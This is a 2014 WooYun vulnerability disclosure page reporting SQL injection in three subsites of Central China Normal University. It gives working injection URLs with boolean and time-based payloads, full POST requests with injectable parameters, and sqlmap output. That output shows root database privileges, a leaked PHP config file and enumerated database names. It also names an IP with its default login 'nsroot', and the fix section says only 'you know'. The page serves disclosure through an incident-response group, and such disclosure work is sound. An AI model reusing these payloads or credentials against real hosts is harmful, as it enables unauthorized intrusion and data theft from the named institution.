当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051025

漏洞标题:华中师范大学3个分站sql注入打包

相关厂商:华中师范大学

漏洞作者: m_vptr

提交时间:2014-04-04 11:13

修复时间:2014-05-19 11:14

公开时间:2014-05-19 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-04: 细节已通知厂商并且等待厂商处理中
2014-04-06: 厂商已经确认,细节仅向厂商公开
2014-04-16: 细节向核心白帽子及相关领域专家公开
2014-04-26: 细节向普通白帽子公开
2014-05-06: 细节向实习白帽子公开
2014-05-19: 细节向公众公开

简要描述:

sql注入,其中一个可拖库、读文件。

详细说明:

http://etif2013.ccnu.edu.cn/
SQL注入路径:http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND 8771=8771 AND (6750=6750).shtml
爆路径:http://etif2013.ccnu.edu.cn/Public/Min/builder/
218.119.196.24 post参数未过滤 

POST /resourcecatalogtool-tool/resourcecatalogtool/begin.jsf HTTP/1.1
Host: 218.199.196.24
Proxy-Connection: keep-alive
Content-Length: 4104
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.199.196.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://218.199.196.24/resourceadmin-tool/resourceadmin/user/pgp_user_login.jsf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: JSESSIONID=49B1A459DF0F6FD4C6123D983E2753B4; JSESSIONID=5551ac5b-472d-45f7-af53-802d20fce70a.localhost; arp_scroll_position=0
_idJsp0%3AuserName=test&_idJsp0%3Apw=a&_idJsp0%3A_idJsp2.x=28&_idJsp0%3A_idJsp2.y=11&_idJsp0_SUBMIT=1&_idJsp0%3A_idcl=&_idJsp0%3A_link_hidden_=&javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAANzcgA6b3JnLmFqYXg0anNmLmFwcGxpY2F0aW9uLkFqYXhTdGF0ZU1hbmFnZXIkVHJlZVN0cnV0dXJlTm9kZYKP75jDZiMJDAAAeHB6AAABnAAjb3JnLmFqYXg0anNmLmNvbXBvbmVudC5BamF4Vmlld1Jvb3QACV92aWV3Um9vdAAAAAAAAAABACNqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sRm9ybQAHX2lkSnNwMAAAAAAAAAAFAChqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRUZXh0AAh1c2VyTmFtZQAAAAAAAAAAACpqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRTZWNyZXQAAnB3AAAAAAAAAAAAKWphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxPdXRwdXRUZXh0AAdfaWRKc3AxAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AyAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AzAAAAAAAAAAB4dXEAfgAAAAAAAnVxAH4AAAAAAAN1cQB%2BAAAAAAACdXEAfgAAAAAABXVxAH4AAAAAAAd0AAlfdmlld1Jvb3RwcHEAfgAJc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAADHcIAAAAEAAAAAB4cHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAgAESQAIaGFzaGNvZGVMAAdjb3VudHJ5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAIbGFuZ3VhZ2VxAH4ADUwAB3ZhcmlhbnRxAH4ADXhw%2F%2F%2F%2F%2F3QAAHQAAnpocQB%2BAA90AApIVE1MX0JBU0lDdAAmL3Jlc291cmNlYWRtaW4vdXNlci9wZ3BfdXNlcl9sb2dpbi5qc3BzcgAOamF2YS5sYW5nLkxvbmc7i%2BSQzI8j3wIAAUoABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAAAAAAB1cQB%2BAAAAAAAFc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc%2Bu4CAAFaAAV2YWx1ZXhwAHEAfgAYcHEAfgAYcQB%2BABhwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAF1cQB%2BAAAAAAADdXEAfgAAAAAAFnVxAH4AAAAAAAd0AAdfaWRKc3AwcHQAEGphdmF4LmZhY2VzLkZvcm1xAH4AHnNxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAnQAMmphdmF4LmZhY2VzLndlYmFwcC5VSUNvbXBvbmVudFRhZy5GT1JNRVJfQ0hJTERfSURTc3IAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAFdAAHX2lkSnNwM3QACHVzZXJOYW1ldAAHX2lkSnNwMXQAAnB3dAAHX2lkSnNwMnh0AAxmb3JjZUlkSW5kZXhzcQB%2BABcBeHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4AGQAAAAV3BAAAAAV1cQB%2BAAAAAAADdXEAfgAAAAAAG3VxAH4AAAAAAAl1cQB%2BAAAAAAADdXEAfgAAAAAAB3EAfgAlcHQAEGphdmF4LmZhY2VzLlRleHR0ABBfaWRKc3AwOnVzZXJOYW1lc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABdAAFdmFsdWVzcgAramF2YXguZmFjZXMuY29tcG9uZW50Ll9BdHRhY2hlZFN0YXRlV3JhcHBlckSr5kB900%2FEAgACTAAGX2NsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMABNfd3JhcHBlZFN0YXRlT2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7eHB2cgAmb3JnLmFwYWNoZS5teWZhY2VzLmVsLlZhbHVlQmluZGluZ0ltcGwAAAAAAAAAAAAAAHhwdAAcI3tSZXNvdXJjZVVzZXJCZWFuLnVzZXJOYW1lfXhwcHBxAH4AGHBwcQB%2BACpwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAUAAAAFHB0AAN0eHRwcHBwdXEAfgAAAAAAA3VxAH4AAAAAABx1cQB%2BAAAAAAAJdXEAfgAAAAAAA3VxAH4AAAAAAAdxAH4AJ3B0ABJqYXZheC5mYWNlcy5TZWNyZXR0AApfaWRKc3AwOnB3c3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABcQB%2BADVzcQB%2BADZxAH4AO3QAFiN7UmVzb3VyY2VVc2VyQmVhbi5wd314cHBwcQB%2BABhwcHEAfgAqcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4APQAAABRwcQB%2BAD9wcHBwdXEAfgAAAAAAA3VxAH4AAAAAAAV1cQB%2BAAAAAAADdXEAfgAAAAAAB3EAfgAmcHEAfgAxdAAPX2lkSnNwMDpfaWRKc3Axc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB%2BAClxAH4AKnhwc3EAfgAKP0AAAAAAAAN3CAAAAAQAAAACcQB%2BADVzcQB%2BADZxAH4AO3QAGCN7UmVzb3VyY2VVc2VyQmVhbi50aXBzfXQACHJlbmRlcmVkc3EAfgA2cQB%2BADt0AB4je1Jlc291cmNlVXNlckJlYW4udGlwcyE9bnVsbH14cHBwdAAYZm9udC1zaXplOjE0cHg7Y29sb3I6cmVkcHBwcHVxAH4AAAAAAAN1cQB%2BAAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AKHB0ABJqYXZheC5mYWNlcy5CdXR0b250AA9faWRKc3AwOl9pZEpzcDJzcQB%2BAAo%2FQAAAAAAADHcIAAAAEAAAAAFxAH4AKXEAfgAqeHBwc3EAfgA2dnIAJ29yZy5hcGFjaGUubXlmYWNlcy5lbC5NZXRob2RCaW5kaW5nSW1wbAAAAAAAAAAAAAAAeHB1cQB%2BAAAAAAACdAAbI3tSZXNvdXJjZVVzZXJCZWFuLnRvTG9naW59cHBwcHBwcHB0ABwuLi9pbWFnZXMvbG9naW4vbG9naW5faW4uZ2lmcHBwcHBwcHBwcHBwcHBwcHQADGFsaWduOmNlbnRlcnBwcHBwcHVxAH4AAAAAAAN1cQB%2BAAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AJHBxAH4AXXQAD19pZEpzcDA6X2lkSnNwM3NxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAXEAfgApcQB%2BACp4cHBzcQB%2BADZxAH4AYnVxAH4AAAAAAAJ0ACIje1Jlc291cmNlVXNlckJlYW4udG9QYWdlUmVnc2l0ZXJ9cHBwcHBwcHB0AB0uLi9pbWFnZXMvbG9naW4vbG9naW5fcmVnLmdpZnBwcHBwcHBwcHBwcHBwcHBxAH4AZnBwcHBwcHh4cHEAfgAS


218.199.196.243 考试中心 post参数未过滤

POST /scshow.asp HTTP/1.1
Host: 218.199.196.243
Proxy-Connection: keep-alive
Content-Length: 102
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.199.196.243
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://218.199.196.243/scqry.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: ASPSESSIONIDASBQSRRB=HNBFGCGDHKCMPAECDDCKEHNE; arp_scroll_position=61
dt=201306&lang=%D3%A2%D3%EF&gd=4&kno=2012212306&idn=111111111111111&name=a&B1=%BF%AA%CA%BC%B2%E9%D1%AF


http://218.199.196.109/Huashi/
被人篡改
http://218.199.196.221
默认用户名、密码:nsroot

漏洞证明:

http://etif2013.ccnu.edu.cn/

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND 8771=8771 AND (6750=6750).shtml
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://etif2013.ccnu.edu.cn:80/index.php?s=/ConferenceInfo/conferenceDetail/id/2-(1) AND SLEEP(10) AND (6668=6668).shtml
---
[01:39:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5

database management system users roles:
[*] %root% (administrator) [25]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: UPDATE

<?php
$config1 = array(
    /* 数据库设置 */
    'DB_TYPE' => 'mysql', // 数据库类型
    'SHOW_PAGE_TRACE' => FALSE,
    'TOKEN_ON' => true, // 是否开启令牌验证
    'TOKEN_NAME' => '__hash__', // 令牌验证的表单隐藏字段名称
    'TOKEN_TYPE' => 'md5', //令牌哈希验证规则 默认为MD5
    'TOKEN_RESET' => FALSE, //令牌验证出错后是否重置令牌 默认为true
    /* 开发人员相关信息 */
    'AUTHOR_INFO' => array(
        'author' => '***马赛克***',
        'author_email' => '***马赛克***@qq.com',
    ),
    'DEFAULT_AJAX_RETURN'=>'json',
);
$config2 = WEB_ROOT . "Common/systemConfig.php";
$config2 = file_exists($config2) ? include "$config2" : array();
return array_merge($config1, $config2);
?>

218.119.196.24

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: _idJsp0:userName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: _idJsp0:userName='or'a'='a' AND 6607=6607 AND 'VNvy'='VNvy&_idJsp0:pw='or'a'='a&_idJsp0:_idJsp2.x=28&_idJsp0:_idJsp2.y=11&_idJsp0_SUBMIT=1&_idJsp0:_idcl=&_idJsp0:_link_hidden_=&javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAANzcgA6b3JnLmFqYXg0anNmLmFwcGxpY2F0aW9uLkFqYXhTdGF0ZU1hbmFnZXIkVHJlZVN0cnV0dXJlTm9kZYKP75jDZiMJDAAAeHB6AAABnAAjb3JnLmFqYXg0anNmLmNvbXBvbmVudC5BamF4Vmlld1Jvb3QACV92aWV3Um9vdAAAAAAAAAABACNqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sRm9ybQAHX2lkSnNwMAAAAAAAAAAFAChqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRUZXh0AAh1c2VyTmFtZQAAAAAAAAAAACpqYXZheC5mYWNlcy5jb21wb25lbnQuaHRtbC5IdG1sSW5wdXRTZWNyZXQAAnB3AAAAAAAAAAAAKWphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxPdXRwdXRUZXh0AAdfaWRKc3AxAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AyAAAAAAAAAAAALGphdmF4LmZhY2VzLmNvbXBvbmVudC5odG1sLkh0bWxDb21tYW5kQnV0dG9uAAdfaWRKc3AzAAAAAAAAAAB4dXEAfgAAAAAAAnVxAH4AAAAAAAN1cQB+AAAAAAACdXEAfgAAAAAABXVxAH4AAAAAAAd0AAlfdmlld1Jvb3RwcHEAfgAJc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAB4cHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAgAESQAIaGFzaGNvZGVMAAdjb3VudHJ5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAIbGFuZ3VhZ2VxAH4ADUwAB3ZhcmlhbnRxAH4ADXhw/////3QAAHQAAnpocQB+AA90AApIVE1MX0JBU0lDdAAmL3Jlc291cmNlYWRtaW4vdXNlci9wZ3BfdXNlcl9sb2dpbi5qc3BzcgAOamF2YS5sYW5nLkxvbmc7i+SQzI8j3wIAAUoABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAAAAAAB1cQB+AAAAAAAFc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc+u4CAAFaAAV2YWx1ZXhwAHEAfgAYcHEAfgAYcQB+ABhwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAF1cQB+AAAAAAADdXEAfgAAAAAAFnVxAH4AAAAAAAd0AAdfaWRKc3AwcHQAEGphdmF4LmZhY2VzLkZvcm1xAH4AHnNxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAnQAMmphdmF4LmZhY2VzLndlYmFwcC5VSUNvbXBvbmVudFRhZy5GT1JNRVJfQ0hJTERfSURTc3IAEWphdmEudXRpbC5IYXNoU2V0ukSFlZa4tzQDAAB4cHcMAAAAED9AAAAAAAAFdAAHX2lkSnNwM3QACHVzZXJOYW1ldAAHX2lkSnNwMXQAAnB3dAAHX2lkSnNwMnh0AAxmb3JjZUlkSW5kZXhzcQB+ABcBeHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4AGQAAAAV3BAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAG3VxAH4AAAAAAAl1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAlcHQAEGphdmF4LmZhY2VzLlRleHR0ABBfaWRKc3AwOnVzZXJOYW1lc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABdAAFdmFsdWVzcgAramF2YXguZmFjZXMuY29tcG9uZW50Ll9BdHRhY2hlZFN0YXRlV3JhcHBlckSr5kB900/EAgACTAAGX2NsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMABNfd3JhcHBlZFN0YXRlT2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7eHB2cgAmb3JnLmFwYWNoZS5teWZhY2VzLmVsLlZhbHVlQmluZGluZ0ltcGwAAAAAAAAAAAAAAHhwdAAcI3tSZXNvdXJjZVVzZXJCZWFuLnVzZXJOYW1lfXhwcHBxAH4AGHBwcQB+ACpwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAUAAAAFHB0AAN0eHRwcHBwdXEAfgAAAAAAA3VxAH4AAAAAABx1cQB+AAAAAAAJdXEAfgAAAAAAA3VxAH4AAAAAAAdxAH4AJ3B0ABJqYXZheC5mYWNlcy5TZWNyZXR0AApfaWRKc3AwOnB3c3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAF3CAAAAAIAAAABcQB+ADVzcQB+ADZxAH4AO3QAFiN7UmVzb3VyY2VVc2VyQmVhbi5wd314cHBwcQB+ABhwcHEAfgAqcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHNxAH4APQAAABRwcQB+AD9wcHBwdXEAfgAAAAAAA3VxAH4AAAAAAAV1cQB+AAAAAAADdXEAfgAAAAAAB3EAfgAmcHEAfgAxdAAPX2lkSnNwMDpfaWRKc3Axc3EAfgAKP0AAAAAAAAx3CAAAABAAAAABcQB+AClxAH4AKnhwc3EAfgAKP0AAAAAAAAN3CAAAAAQAAAACcQB+ADVzcQB+ADZxAH4AO3QAGCN7UmVzb3VyY2VVc2VyQmVhbi50aXBzfXQACHJlbmRlcmVkc3EAfgA2cQB+ADt0AB4je1Jlc291cmNlVXNlckJlYW4udGlwcyE9bnVsbH14cHBwdAAYZm9udC1zaXplOjE0cHg7Y29sb3I6cmVkcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AKHB0ABJqYXZheC5mYWNlcy5CdXR0b250AA9faWRKc3AwOl9pZEpzcDJzcQB+AAo/QAAAAAAADHcIAAAAEAAAAAFxAH4AKXEAfgAqeHBwc3EAfgA2dnIAJ29yZy5hcGFjaGUubXlmYWNlcy5lbC5NZXRob2RCaW5kaW5nSW1wbAAAAAAAAAAAAAAAeHB1cQB+AAAAAAACdAAbI3tSZXNvdXJjZVVzZXJCZWFuLnRvTG9naW59cHBwcHBwcHB0ABwuLi9pbWFnZXMvbG9naW4vbG9naW5faW4uZ2lmcHBwcHBwcHBwcHBwcHBwcHQADGFsaWduOmNlbnRlcnBwcHBwcHVxAH4AAAAAAAN1cQB+AAAAAAAbdXEAfgAAAAAABXVxAH4AAAAAAAdxAH4AJHBxAH4AXXQAD19pZEpzcDA6X2lkSnNwM3NxAH4ACj9AAAAAAAAMdwgAAAAQAAAAAXEAfgApcQB+ACp4cHBzcQB+ADZxAH4AYnVxAH4AAAAAAAJ0ACIje1Jlc291cmNlVXNlckJlYW4udG9QYWdlUmVnc2l0ZXJ9cHBwcHBwcHB0AB0uLi9pbWFnZXMvbG9naW4vbG9naW5fcmVnLmdpZnBwcHBwcHBwcHBwcHBwcHBxAH4AZnBwcHBwcHh4cHEAfgAS
---

218.199.196.243

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dt, type: Unescaped numeric (default)
[1] place: POST, parameter: name, type: Single quoted string
[2] place: POST, parameter: idn, type: Single quoted string
[3] place: POST, parameter: kno, type: Single quoted string
[q] Quit
> 1
[04:15:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[04:15:37] [INFO] fetching database names
[04:15:37] [INFO] the SQL query used returns 5 entries
[04:15:37] [INFO] retrieved: "CETINFO"
[04:15:37] [INFO] retrieved: "master"
[04:15:37] [INFO] retrieved: "model"
[04:15:37] [INFO] retrieved: "msdb"
[04:15:37] [INFO] retrieved: "tempdb"
available databases [5]:                                                                                                                                                                                   
[*] CETINFO
[*] master
[*] model
[*] msdb
[*] tempdb

修复方案:

你懂得

版权声明:转载请注明来源 m_vptr@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-04-06 19:55

厂商回复:

正在通知相关院校处理

最新状态:

暂无

漏洞评价:

评论